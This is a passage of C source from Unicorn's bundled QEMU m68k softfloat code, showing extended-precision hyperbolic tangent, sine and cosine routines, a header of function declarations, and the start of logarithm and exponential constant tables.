+ 2^(-126) */ float_raise(float_flag_inexact, status); return a; } else { status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; return floatx80_etox(a, status); } } } else { /* |X| < 1/4 */ if (aExp >= 0x3FBE) { fp0 = a; fp0 = floatx80_mul(fp0, fp0, status); /* S = X*X */ fp1 = 
float32_to_floatx80(make_float32(0x2F30CAA8), status); /* B12 */ fp1 = floatx80_mul(fp1, fp0, status); /* S * B12 */ fp2 = float32_to_floatx80(make_float32(0x310F8290), status); /* B11 */ fp1 = floatx80_add(fp1, float32_to_floatx80( make_float32(0x32D73220), status), status); /* B10 */ fp2 = floatx80_mul(fp2, fp0, status); fp1 = floatx80_mul(fp1, fp0, status); fp2 = floatx80_add(fp2, float32_to_floatx80( make_float32(0x3493F281), status), status); /* B9 */ fp1 = floatx80_add(fp1, float64_to_floatx80( make_float64(0x3EC71DE3A5774682), status), status); /* B8 */ fp2 = floatx80_mul(fp2, fp0, status); fp1 = floatx80_mul(fp1, fp0, status); fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3EFA01A019D7CB68), status), status); /* B7 */ fp1 = floatx80_add(fp1, float64_to_floatx80( make_float64(0x3F2A01A01A019DF3), status), status); /* B6 */ fp2 = floatx80_mul(fp2, fp0, status); fp1 = floatx80_mul(fp1, fp0, status); fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3F56C16C16C170E2), status), status); /* B5 */ fp1 = floatx80_add(fp1, float64_to_floatx80( make_float64(0x3F81111111111111), status), status); /* B4 */ fp2 = floatx80_mul(fp2, fp0, status); fp1 = floatx80_mul(fp1, fp0, status); fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3FA5555555555555), status), status); /* B3 */ fp3 = packFloatx80(0, 0x3FFC, UINT64_C(0xAAAAAAAAAAAAAAAB)); fp1 = floatx80_add(fp1, fp3, status); /* B2 */ fp2 = floatx80_mul(fp2, fp0, status); fp1 = floatx80_mul(fp1, fp0, status); fp2 = floatx80_mul(fp2, fp0, status); fp1 = floatx80_mul(fp1, a, status); fp0 = floatx80_mul(fp0, float32_to_floatx80( make_float32(0x3F000000), status), status); /* S*B1 */ fp1 = floatx80_add(fp1, fp2, status); /* Q */ fp0 = floatx80_add(fp0, fp1, status); /* S*B1+Q */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, a, status); float_raise(float_flag_inexact, status); return a; } else { /* |X| < 2^(-65) */ sc = packFloatx80(1, 1, one_sig); fp0 = a; if (aExp < 0x0033) { /* |X| < 2^(-16382) */ fp0 = floatx80_mul(fp0, float64_to_floatx80( make_float64(0x48B0000000000000), status), status); fp0 = floatx80_add(fp0, sc, status); status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_mul(fp0, float64_to_floatx80( make_float64(0x3730000000000000), status), status); } else { status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, sc, status); } float_raise(float_flag_inexact, status); return a; } } } /* * Hyperbolic tangent */ floatx80 floatx80_tanh(floatx80 a, float_status *status) { flag aSign, vSign; int32_t aExp, vExp; uint64_t aSig, vSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact; floatx80 fp0, fp1; uint32_t sign; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } return packFloatx80(aSign, one_exp, one_sig); } if (aExp == 0 && aSig == 0) { return packFloatx80(aSign, 0, 0); } user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; compact = floatx80_make_compact(aExp, aSig); if (compact < 0x3FD78000 || compact > 0x3FFFDDCE) { /* TANHBORS */ if (compact < 0x3FFF8000) { /* TANHSM */ status->float_rounding_mode = user_rnd_mode; 
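/*
 * TANHSM: here |X| < 2^(-40), and tanh(X) = X - X^3/3 + ... differs
 * from X by far less than one ulp of the 64-bit significand, so the
 * code below just returns X (rounded to the user's precision by
 * floatx80_move) and signals inexact.
 */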
status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_move(a, status); float_raise(float_flag_inexact, status); return a; } else { if (compact > 0x40048AA1) { /* TANHHUGE */ sign = 0x3F800000; sign |= aSign ? 0x80000000 : 0x00000000; fp0 = float32_to_floatx80(make_float32(sign), status); sign &= 0x80000000; sign ^= 0x80800000; /* -SIGN(X)*EPS */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, float32_to_floatx80(make_float32(sign), status), status); float_raise(float_flag_inexact, status); return a; } else { fp0 = packFloatx80(0, aExp + 1, aSig); /* Y = 2|X| */ fp0 = floatx80_etox(fp0, status); /* FP0 IS EXP(Y) */ fp0 = floatx80_add(fp0, float32_to_floatx80( make_float32(0x3F800000), status), status); /* EXP(Y)+1 */ sign = aSign ? 0x80000000 : 0x00000000; fp1 = floatx80_div(float32_to_floatx80(make_float32( sign ^ 0xC0000000), status), fp0, status); /* -SIGN(X)*2 / [EXP(Y)+1] */ fp0 = float32_to_floatx80(make_float32(sign | 0x3F800000), status); /* SIGN */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp1, fp0, status); float_raise(float_flag_inexact, status); return a; } } } else { /* 2**(-40) < |X| < (5/2)LOG2 */ fp0 = packFloatx80(0, aExp + 1, aSig); /* Y = 2|X| */ fp0 = floatx80_etoxm1(fp0, status); /* FP0 IS Z = EXPM1(Y) */ fp1 = floatx80_add(fp0, float32_to_floatx80(make_float32(0x40000000), status), status); /* Z+2 */ vSign = extractFloatx80Sign(fp1); vExp = extractFloatx80Exp(fp1); vSig = extractFloatx80Frac(fp1); fp1 = packFloatx80(vSign ^ aSign, vExp, vSig); status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_div(fp0, fp1, status); float_raise(float_flag_inexact, status); return a; } } /* * Hyperbolic sine */ floatx80 floatx80_sinh(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact; floatx80 fp0, fp1, fp2; float32 fact; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } return packFloatx80(aSign, floatx80_infinity.high, floatx80_infinity.low); } if (aExp == 0 && aSig == 0) { return packFloatx80(aSign, 0, 0); } user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; compact = floatx80_make_compact(aExp, aSig); if (compact > 0x400CB167) { /* SINHBIG */ if (compact > 0x400CB2B3) { status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; return roundAndPackFloatx80(status->floatx80_rounding_precision, aSign, 0x8000, aSig, 0, status); } else { fp0 = floatx80_abs(a); /* Y = |X| */ fp0 = floatx80_sub(fp0, float64_to_floatx80( make_float64(0x40C62D38D3D64634), status), status); /* (|X|-16381LOG2_LEAD) */ fp0 = floatx80_sub(fp0, float64_to_floatx80( make_float64(0x3D6F90AEB1E75CC7), status), status); /* |X| - 16381 LOG2, ACCURATE */ fp0 = floatx80_etox(fp0, status); fp2 = packFloatx80(aSign, 0x7FFB, one_sig); status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_mul(fp0, fp2, status); float_raise(float_flag_inexact, status); return a; } } else { /* |X| < 16380 LOG2 */ fp0 = floatx80_abs(a); /* Y = |X| */ fp0 = floatx80_etoxm1(fp0, 
status); /* FP0 IS Z = EXPM1(Y) */ fp1 = floatx80_add(fp0, float32_to_floatx80(make_float32(0x3F800000), status), status); /* 1+Z */ fp2 = fp0; fp0 = floatx80_div(fp0, fp1, status); /* Z/(1+Z) */ fp0 = floatx80_add(fp0, fp2, status); fact = packFloat32(aSign, 0x7E, 0); status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_mul(fp0, float32_to_floatx80(fact, status), status); float_raise(float_flag_inexact, status); return a; } } /* * Hyperbolic cosine */ floatx80 floatx80_cosh(floatx80 a, float_status *status) { int32_t aExp; uint64_t aSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact; floatx80 fp0, fp1; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } return packFloatx80(0, floatx80_infinity.high, floatx80_infinity.low); } if (aExp == 0 && aSig == 0) { return packFloatx80(0, one_exp, one_sig); } user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; compact = floatx80_make_compact(aExp, aSig); if (compact > 0x400CB167) { if (compact > 0x400CB2B3) { status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; return roundAndPackFloatx80(status->floatx80_rounding_precision, 0, 0x8000, one_sig, 0, status); } else { fp0 = packFloatx80(0, aExp, aSig); fp0 = floatx80_sub(fp0, float64_to_floatx80( make_float64(0x40C62D38D3D64634), status), status); fp0 = floatx80_sub(fp0, float64_to_floatx80( make_float64(0x3D6F90AEB1E75CC7), status), status); fp0 = floatx80_etox(fp0, status); fp1 = packFloatx80(0, 0x7FFB, one_sig); status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_mul(fp0, fp1, status); float_raise(float_flag_inexact, status); return a; } } fp0 = packFloatx80(0, aExp, aSig); /* |X| */ fp0 = floatx80_etox(fp0, status); /* EXP(|X|) */ fp0 = floatx80_mul(fp0, float32_to_floatx80(make_float32(0x3F000000), status), status); /* (1/2)*EXP(|X|) */ fp1 = float32_to_floatx80(make_float32(0x3E800000), status); /* 1/4 */ fp1 = floatx80_div(fp1, fp0, status); /* 1/(2*EXP(|X|)) */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, fp1, status); float_raise(float_flag_inexact, status); return a; }
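/*
 * Usage sketch for the transcendental helpers above (illustrative
 * only; the float_status setup shown is an assumption, not taken from
 * this file): every helper takes a float_status that carries the
 * rounding mode, the floatx80 rounding precision and the accumulated
 * IEEE exception flags.
 */
#if 0
#include "fpu/softfloat.h"
static floatx80 cosh_of_one(void)
{
    float_status st = {0};
    st.float_rounding_mode = float_round_nearest_even;
    st.floatx80_rounding_precision = 80;
    floatx80 x = int32_to_floatx80(1, &st);
    return floatx80_cosh(x, &st); /* ~1.5430806348... */
}
#endif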
unicorn-2.1.1/qemu/target/m68k/softfloat.h
/* * Ported from a work by Andreas Grabher for Previous, NeXT Computer Emulator, * derived from NetBSD M68040 FPSP functions, * derived from release 2a of the SoftFloat IEC/IEEE Floating-point Arithmetic * Package. Those parts of the code (and some later contributions) are * provided under that license, as detailed below. * It has subsequently been modified by contributors to the QEMU Project, * so some portions are provided under: * the SoftFloat-2a license * the BSD license * GPL-v2-or-later * * Any future contributions to this file will be taken to be licensed under * the Softfloat-2a license unless specifically indicated otherwise. */ /* * Portions of this work are licensed under the terms of the GNU GPL, * version 2 or later. See the COPYING file in the top-level directory. */ #ifndef TARGET_M68K_SOFTFLOAT_H #define TARGET_M68K_SOFTFLOAT_H #include "fpu/softfloat.h" floatx80 floatx80_mod(floatx80 a, floatx80 b, float_status *status); floatx80 floatx80_getman(floatx80 a, float_status *status); floatx80 floatx80_getexp(floatx80 a, float_status *status); floatx80 floatx80_scale(floatx80 a, floatx80 b, float_status *status); floatx80 floatx80_move(floatx80 a, float_status *status); floatx80 floatx80_lognp1(floatx80 a, float_status *status); floatx80 floatx80_logn(floatx80 a, float_status *status); floatx80 floatx80_log10(floatx80 a, float_status *status); floatx80 floatx80_log2(floatx80 a, float_status *status); floatx80 floatx80_etox(floatx80 a, float_status *status); floatx80 floatx80_twotox(floatx80 a, float_status *status); floatx80 floatx80_tentox(floatx80 a, float_status *status); floatx80 floatx80_tan(floatx80 a, float_status *status); floatx80 floatx80_sin(floatx80 a, float_status *status); floatx80 floatx80_cos(floatx80 a, float_status *status); floatx80 floatx80_atan(floatx80 a, float_status *status); floatx80 floatx80_asin(floatx80 a, float_status *status); floatx80 floatx80_acos(floatx80 a, float_status *status); floatx80 floatx80_atanh(floatx80 a, float_status *status); floatx80 floatx80_etoxm1(floatx80 a, float_status *status); floatx80 floatx80_tanh(floatx80 a, float_status *status); floatx80 floatx80_sinh(floatx80 a, float_status *status); floatx80 floatx80_cosh(floatx80 a, float_status *status); #endif
unicorn-2.1.1/qemu/target/m68k/softfloat_fpsp_tables.h
/* * Ported from a work by Andreas Grabher for Previous, NeXT Computer Emulator, * derived from NetBSD M68040 FPSP functions, * derived from release 2a of the SoftFloat IEC/IEEE Floating-point Arithmetic * Package. Those parts of the code (and some later contributions) are * provided under that license, as detailed below. 
* It has subsequently been modified by contributors to the QEMU Project, * so some portions are provided under: * the SoftFloat-2a license * the BSD license * GPL-v2-or-later * * Any future contributions to this file will be taken to be licensed under * the Softfloat-2a license unless specifically indicated otherwise. */ /* * Portions of this work are licensed under the terms of the GNU GPL, * version 2 or later. See the COPYING file in the top-level directory. */ #ifndef TARGET_M68K_SOFTFLOAT_FPSP_TABLES_H #define TARGET_M68K_SOFTFLOAT_FPSP_TABLES_H static const floatx80 log_tbl[128] = { make_floatx80_init(0x3FFE, 0xFE03F80FE03F80FE), make_floatx80_init(0x3FF7, 0xFF015358833C47E2), make_floatx80_init(0x3FFE, 0xFA232CF252138AC0), make_floatx80_init(0x3FF9, 0xBDC8D83EAD88D549), make_floatx80_init(0x3FFE, 0xF6603D980F6603DA), make_floatx80_init(0x3FFA, 0x9CF43DCFF5EAFD48), make_floatx80_init(0x3FFE, 0xF2B9D6480F2B9D65), make_floatx80_init(0x3FFA, 0xDA16EB88CB8DF614), make_floatx80_init(0x3FFE, 0xEF2EB71FC4345238), make_floatx80_init(0x3FFB, 0x8B29B7751BD70743), make_floatx80_init(0x3FFE, 0xEBBDB2A5C1619C8C), make_floatx80_init(0x3FFB, 0xA8D839F830C1FB49), make_floatx80_init(0x3FFE, 0xE865AC7B7603A197), make_floatx80_init(0x3FFB, 0xC61A2EB18CD907AD), make_floatx80_init(0x3FFE, 0xE525982AF70C880E), make_floatx80_init(0x3FFB, 0xE2F2A47ADE3A18AF), make_floatx80_init(0x3FFE, 0xE1FC780E1FC780E2), make_floatx80_init(0x3FFB, 0xFF64898EDF55D551), make_floatx80_init(0x3FFE, 0xDEE95C4CA037BA57), make_floatx80_init(0x3FFC, 0x8DB956A97B3D0148), make_floatx80_init(0x3FFE, 0xDBEB61EED19C5958), make_floatx80_init(0x3FFC, 0x9B8FE100F47BA1DE), make_floatx80_init(0x3FFE, 0xD901B2036406C80E), make_floatx80_init(0x3FFC, 0xA9372F1D0DA1BD17), make_floatx80_init(0x3FFE, 0xD62B80D62B80D62C), make_floatx80_init(0x3FFC, 0xB6B07F38CE90E46B), make_floatx80_init(0x3FFE, 0xD3680D3680D3680D), make_floatx80_init(0x3FFC, 0xC3FD032906488481), make_floatx80_init(0x3FFE, 0xD0B69FCBD2580D0B), make_floatx80_init(0x3FFC, 0xD11DE0FF15AB18CA), make_floatx80_init(0x3FFE, 0xCE168A7725080CE1), make_floatx80_init(0x3FFC, 0xDE1433A16C66B150), make_floatx80_init(0x3FFE, 0xCB8727C065C393E0), make_floatx80_init(0x3FFC, 0xEAE10B5A7DDC8ADD), make_floatx80_init(0x3FFE, 0xC907DA4E871146AD), make_floatx80_init(0x3FFC, 0xF7856E5EE2C9B291), make_floatx80_init(0x3FFE, 0xC6980C6980C6980C), make_floatx80_init(0x3FFD, 0x82012CA5A68206D7), make_floatx80_init(0x3FFE, 0xC4372F855D824CA6), make_floatx80_init(0x3FFD, 0x882C5FCD7256A8C5), make_floatx80_init(0x3FFE, 0xC1E4BBD595F6E947), make_floatx80_init(0x3FFD, 0x8E44C60B4CCFD7DE), make_floatx80_init(0x3FFE, 0xBFA02FE80BFA02FF), make_floatx80_init(0x3FFD, 0x944AD09EF4351AF6), make_floatx80_init(0x3FFE, 0xBD69104707661AA3), make_floatx80_init(0x3FFD, 0x9A3EECD4C3EAA6B2), make_floatx80_init(0x3FFE, 0xBB3EE721A54D880C), make_floatx80_init(0x3FFD, 0xA0218434353F1DE8), make_floatx80_init(0x3FFE, 0xB92143FA36F5E02E), make_floatx80_init(0x3FFD, 0xA5F2FCABBBC506DA), make_floatx80_init(0x3FFE, 0xB70FBB5A19BE3659), make_floatx80_init(0x3FFD, 0xABB3B8BA2AD362A5), make_floatx80_init(0x3FFE, 0xB509E68A9B94821F), make_floatx80_init(0x3FFD, 0xB1641795CE3CA97B), make_floatx80_init(0x3FFE, 0xB30F63528917C80B), make_floatx80_init(0x3FFD, 0xB70475515D0F1C61), make_floatx80_init(0x3FFE, 0xB11FD3B80B11FD3C), make_floatx80_init(0x3FFD, 0xBC952AFEEA3D13E1), make_floatx80_init(0x3FFE, 0xAF3ADDC680AF3ADE), make_floatx80_init(0x3FFD, 0xC2168ED0F458BA4A), make_floatx80_init(0x3FFE, 0xAD602B580AD602B6), make_floatx80_init(0x3FFD, 
0xC788F439B3163BF1), make_floatx80_init(0x3FFE, 0xAB8F69E28359CD11), make_floatx80_init(0x3FFD, 0xCCECAC08BF04565D), make_floatx80_init(0x3FFE, 0xA9C84A47A07F5638), make_floatx80_init(0x3FFD, 0xD24204872DD85160), make_floatx80_init(0x3FFE, 0xA80A80A80A80A80B), make_floatx80_init(0x3FFD, 0xD78949923BC3588A), make_floatx80_init(0x3FFE, 0xA655C4392D7B73A8), make_floatx80_init(0x3FFD, 0xDCC2C4B49887DACC), make_floatx80_init(0x3FFE, 0xA4A9CF1D96833751), make_floatx80_init(0x3FFD, 0xE1EEBD3E6D6A6B9E), make_floatx80_init(0x3FFE, 0xA3065E3FAE7CD0E0), make_floatx80_init(0x3FFD, 0xE70D785C2F9F5BDC), make_floatx80_init(0x3FFE, 0xA16B312EA8FC377D), make_floatx80_init(0x3FFD, 0xEC1F392C5179F283), make_floatx80_init(0x3FFE, 0x9FD809FD809FD80A), make_floatx80_init(0x3FFD, 0xF12440D3E36130E6), make_floatx80_init(0x3FFE, 0x9E4CAD23DD5F3A20), make_floatx80_init(0x3FFD, 0xF61CCE92346600BB), make_floatx80_init(0x3FFE, 0x9CC8E160C3FB19B9), make_floatx80_init(0x3FFD, 0xFB091FD38145630A), make_floatx80_init(0x3FFE, 0x9B4C6F9EF03A3CAA), make_floatx80_init(0x3FFD, 0xFFE97042BFA4C2AD), make_floatx80_init(0x3FFE, 0x99D722DABDE58F06), make_floatx80_init(0x3FFE, 0x825EFCED49369330), make_floatx80_init(0x3FFE, 0x9868C809868C8098), make_floatx80_init(0x3FFE, 0x84C37A7AB9A905C9), make_floatx80_init(0x3FFE, 0x97012E025C04B809), make_floatx80_init(0x3FFE, 0x87224C2E8E645FB7), make_floatx80_init(0x3FFE, 0x95A02568095A0257), make_floatx80_init(0x3FFE, 0x897B8CAC9F7DE298), make_floatx80_init(0x3FFE, 0x9445809445809446), make_floatx80_init(0x3FFE, 0x8BCF55DEC4CD05FE), make_floatx80_init(0x3FFE, 0x92F113840497889C), make_floatx80_init(0x3FFE, 0x8E1DC0FB89E125E5), make_floatx80_init(0x3FFE, 0x91A2B3C4D5E6F809), make_floatx80_init(0x3FFE, 0x9066E68C955B6C9B), make_floatx80_init(0x3FFE, 0x905A38633E06C43B), make_floatx80_init(0x3FFE, 0x92AADE74C7BE59E0), make_floatx80_init(0x3FFE, 0x8F1779D9FDC3A219), make_floatx80_init(0x3FFE, 0x94E9BFF615845643), make_floatx80_init(0x3FFE, 0x8DDA520237694809), make_floatx80_init(0x3FFE, 0x9723A1B720134203), make_floatx80_init(0x3FFE, 0x8CA29C046514E023), make_floatx80_init(0x3FFE, 0x995899C890EB8990), make_floatx80_init(0x3FFE, 0x8B70344A139BC75A), make_floatx80_init(0x3FFE, 0x9B88BDAA3A3DAE2F), make_floatx80_init(0x3FFE, 0x8A42F8705669DB46), make_floatx80_init(0x3FFE, 0x9DB4224FFFE1157C), make_floatx80_init(0x3FFE, 0x891AC73AE9819B50), make_floatx80_init(0x3FFE, 0x9FDADC268B7A12DA), make_floatx80_init(0x3FFE, 0x87F78087F78087F8), make_floatx80_init(0x3FFE, 0xA1FCFF17CE733BD4), make_floatx80_init(0x3FFE, 0x86D905447A34ACC6), make_floatx80_init(0x3FFE, 0xA41A9E8F5446FB9F), make_floatx80_init(0x3FFE, 0x85BF37612CEE3C9B), make_floatx80_init(0x3FFE, 0xA633CD7E6771CD8B), make_floatx80_init(0x3FFE, 0x84A9F9C8084A9F9D), make_floatx80_init(0x3FFE, 0xA8489E600B435A5E), make_floatx80_init(0x3FFE, 0x839930523FBE3368), make_floatx80_init(0x3FFE, 0xAA59233CCCA4BD49), make_floatx80_init(0x3FFE, 0x828CBFBEB9A020A3), make_floatx80_init(0x3FFE, 0xAC656DAE6BCC4985), make_floatx80_init(0x3FFE, 0x81848DA8FAF0D277), make_floatx80_init(0x3FFE, 0xAE6D8EE360BB2468), make_floatx80_init(0x3FFE, 0x8080808080808081), make_floatx80_init(0x3FFE, 0xB07197A23C46C654) }; static const floatx80 exp_tbl[64] = { make_floatx80_init(0x3FFF, 0x8000000000000000), make_floatx80_init(0x3FFF, 0x8164D1F3BC030774), make_floatx80_init(0x3FFF, 0x82CD8698AC2BA1D8), make_floatx80_init(0x3FFF, 0x843A28C3ACDE4048), make_floatx80_init(0x3FFF, 0x85AAC367CC487B14), make_floatx80_init(0x3FFF, 0x871F61969E8D1010), make_floatx80_init(0x3FFF, 
0x88980E8092DA8528), make_floatx80_init(0x3FFF, 0x8A14D575496EFD9C), make_floatx80_init(0x3FFF, 0x8B95C1E3EA8BD6E8), make_floatx80_init(0x3FFF, 0x8D1ADF5B7E5BA9E4), make_floatx80_init(0x3FFF, 0x8EA4398B45CD53C0), make_floatx80_init(0x3FFF, 0x9031DC431466B1DC), make_floatx80_init(0x3FFF, 0x91C3D373AB11C338), make_floatx80_init(0x3FFF, 0x935A2B2F13E6E92C), make_floatx80_init(0x3FFF, 0x94F4EFA8FEF70960), make_floatx80_init(0x3FFF, 0x96942D3720185A00), make_floatx80_init(0x3FFF, 0x9837F0518DB8A970), make_floatx80_init(0x3FFF, 0x99E0459320B7FA64), make_floatx80_init(0x3FFF, 0x9B8D39B9D54E5538), make_floatx80_init(0x3FFF, 0x9D3ED9A72CFFB750), make_floatx80_init(0x3FFF, 0x9EF5326091A111AC), make_floatx80_init(0x3FFF, 0xA0B0510FB9714FC4), make_floatx80_init(0x3FFF, 0xA27043030C496818), make_floatx80_init(0x3FFF, 0xA43515AE09E680A0), make_floatx80_init(0x3FFF, 0xA5FED6A9B15138EC), make_floatx80_init(0x3FFF, 0xA7CD93B4E9653568), make_floatx80_init(0x3FFF, 0xA9A15AB4EA7C0EF8), make_floatx80_init(0x3FFF, 0xAB7A39B5A93ED338), make_floatx80_init(0x3FFF, 0xAD583EEA42A14AC8), make_floatx80_init(0x3FFF, 0xAF3B78AD690A4374), make_floatx80_init(0x3FFF, 0xB123F581D2AC2590), make_floatx80_init(0x3FFF, 0xB311C412A9112488), make_floatx80_init(0x3FFF, 0xB504F333F9DE6484), make_floatx80_init(0x3FFF, 0xB6FD91E328D17790), make_floatx80_init(0x3FFF, 0xB8FBAF4762FB9EE8), make_floatx80_init(0x3FFF, 0xBAFF5AB2133E45FC), make_floatx80_init(0x3FFF, 0xBD08A39F580C36C0), make_floatx80_init(0x3FFF, 0xBF1799B67A731084), make_floatx80_init(0x3FFF, 0xC12C4CCA66709458), make_floatx80_init(0x3FFF, 0xC346CCDA24976408), make_floatx80_init(0x3FFF, 0xC5672A115506DADC), make_floatx80_init(0x3FFF, 0xC78D74C8ABB9B15C), make_floatx80_init(0x3FFF, 0xC9B9BD866E2F27A4), make_floatx80_init(0x3FFF, 0xCBEC14FEF2727C5C), make_floatx80_init(0x3FFF, 0xCE248C151F8480E4), make_floatx80_init(0x3FFF, 0xD06333DAEF2B2594), make_floatx80_init(0x3FFF, 0xD2A81D91F12AE45C), make_floatx80_init(0x3FFF, 0xD4F35AABCFEDFA20), make_floatx80_init(0x3FFF, 0xD744FCCAD69D6AF4), make_floatx80_init(0x3FFF, 0xD99D15C278AFD7B4), make_floatx80_init(0x3FFF, 0xDBFBB797DAF23754), make_floatx80_init(0x3FFF, 0xDE60F4825E0E9124), make_floatx80_init(0x3FFF, 0xE0CCDEEC2A94E110), make_floatx80_init(0x3FFF, 0xE33F8972BE8A5A50), make_floatx80_init(0x3FFF, 0xE5B906E77C8348A8), make_floatx80_init(0x3FFF, 0xE8396A503C4BDC68), make_floatx80_init(0x3FFF, 0xEAC0C6E7DD243930), make_floatx80_init(0x3FFF, 0xED4F301ED9942B84), make_floatx80_init(0x3FFF, 0xEFE4B99BDCDAF5CC), make_floatx80_init(0x3FFF, 0xF281773C59FFB138), make_floatx80_init(0x3FFF, 0xF5257D152486CC2C), make_floatx80_init(0x3FFF, 0xF7D0DF730AD13BB8), make_floatx80_init(0x3FFF, 0xFA83B2DB722A033C), make_floatx80_init(0x3FFF, 0xFD3E0C0CF486C174) }; static const float32 exp_tbl2[64] = { const_float32(0x00000000), const_float32(0x9F841A9B), const_float32(0x9FC1D5B9), const_float32(0xA0728369), const_float32(0x1FC5C95C), const_float32(0x1EE85C9F), const_float32(0x9FA20729), const_float32(0xA07BF9AF), const_float32(0xA0020DCF), const_float32(0x205A63DA), const_float32(0x1EB70051), const_float32(0x1F6EB029), const_float32(0xA0781494), const_float32(0x9EB319B0), const_float32(0x2017457D), const_float32(0x1F11D537), const_float32(0x9FB952DD), const_float32(0x1FE43087), const_float32(0x1FA2A818), const_float32(0x1FDE494D), const_float32(0x20504890), const_float32(0xA073691C), const_float32(0x1F9B7A05), const_float32(0xA0797126), const_float32(0xA071A140), const_float32(0x204F62DA), const_float32(0x1F283C4A), const_float32(0x9F9A7FDC), 
const_float32(0xA05B3FAC), const_float32(0x1FDF2610), const_float32(0x9F705F90), const_float32(0x201F678A), const_float32(0x1F32FB13), const_float32(0x20038B30), const_float32(0x200DC3CC), const_float32(0x9F8B2AE6), const_float32(0xA02BBF70), const_float32(0xA00BF518), const_float32(0xA041DD41), const_float32(0x9FDF137B), const_float32(0x201F1568), const_float32(0x1FC13A2E), const_float32(0xA03F8F03), const_float32(0x1FF4907D), const_float32(0x9E6E53E4), const_float32(0x1FD6D45C), const_float32(0xA076EDB9), const_float32(0x9FA6DE21), const_float32(0x1EE69A2F), const_float32(0x207F439F), const_float32(0x201EC207), const_float32(0x9E8BE175), const_float32(0x20032C4B), const_float32(0x2004DFF5), const_float32(0x1E72F47A), const_float32(0x1F722F22), const_float32(0xA017E945), const_float32(0x1F401A5B), const_float32(0x9FB9A9E3), const_float32(0x20744C05), const_float32(0x1F773A19), const_float32(0x1FFE90D5), const_float32(0xA041ED22), const_float32(0x1F853F3A), }; static const floatx80 exp2_tbl[64] = { make_floatx80_init(0x3FFF, 0x8000000000000000), make_floatx80_init(0x3FFF, 0x8164D1F3BC030773), make_floatx80_init(0x3FFF, 0x82CD8698AC2BA1D7), make_floatx80_init(0x3FFF, 0x843A28C3ACDE4046), make_floatx80_init(0x3FFF, 0x85AAC367CC487B15), make_floatx80_init(0x3FFF, 0x871F61969E8D1010), make_floatx80_init(0x3FFF, 0x88980E8092DA8527), make_floatx80_init(0x3FFF, 0x8A14D575496EFD9A), make_floatx80_init(0x3FFF, 0x8B95C1E3EA8BD6E7), make_floatx80_init(0x3FFF, 0x8D1ADF5B7E5BA9E6), make_floatx80_init(0x3FFF, 0x8EA4398B45CD53C0), make_floatx80_init(0x3FFF, 0x9031DC431466B1DC), make_floatx80_init(0x3FFF, 0x91C3D373AB11C336), make_floatx80_init(0x3FFF, 0x935A2B2F13E6E92C), make_floatx80_init(0x3FFF, 0x94F4EFA8FEF70961), make_floatx80_init(0x3FFF, 0x96942D3720185A00), make_floatx80_init(0x3FFF, 0x9837F0518DB8A96F), make_floatx80_init(0x3FFF, 0x99E0459320B7FA65), make_floatx80_init(0x3FFF, 0x9B8D39B9D54E5539), make_floatx80_init(0x3FFF, 0x9D3ED9A72CFFB751), make_floatx80_init(0x3FFF, 0x9EF5326091A111AE), make_floatx80_init(0x3FFF, 0xA0B0510FB9714FC2), make_floatx80_init(0x3FFF, 0xA27043030C496819), make_floatx80_init(0x3FFF, 0xA43515AE09E6809E), make_floatx80_init(0x3FFF, 0xA5FED6A9B15138EA), make_floatx80_init(0x3FFF, 0xA7CD93B4E965356A), make_floatx80_init(0x3FFF, 0xA9A15AB4EA7C0EF8), make_floatx80_init(0x3FFF, 0xAB7A39B5A93ED337), make_floatx80_init(0x3FFF, 0xAD583EEA42A14AC6), make_floatx80_init(0x3FFF, 0xAF3B78AD690A4375), make_floatx80_init(0x3FFF, 0xB123F581D2AC2590), make_floatx80_init(0x3FFF, 0xB311C412A9112489), make_floatx80_init(0x3FFF, 0xB504F333F9DE6484), make_floatx80_init(0x3FFF, 0xB6FD91E328D17791), make_floatx80_init(0x3FFF, 0xB8FBAF4762FB9EE9), make_floatx80_init(0x3FFF, 0xBAFF5AB2133E45FB), 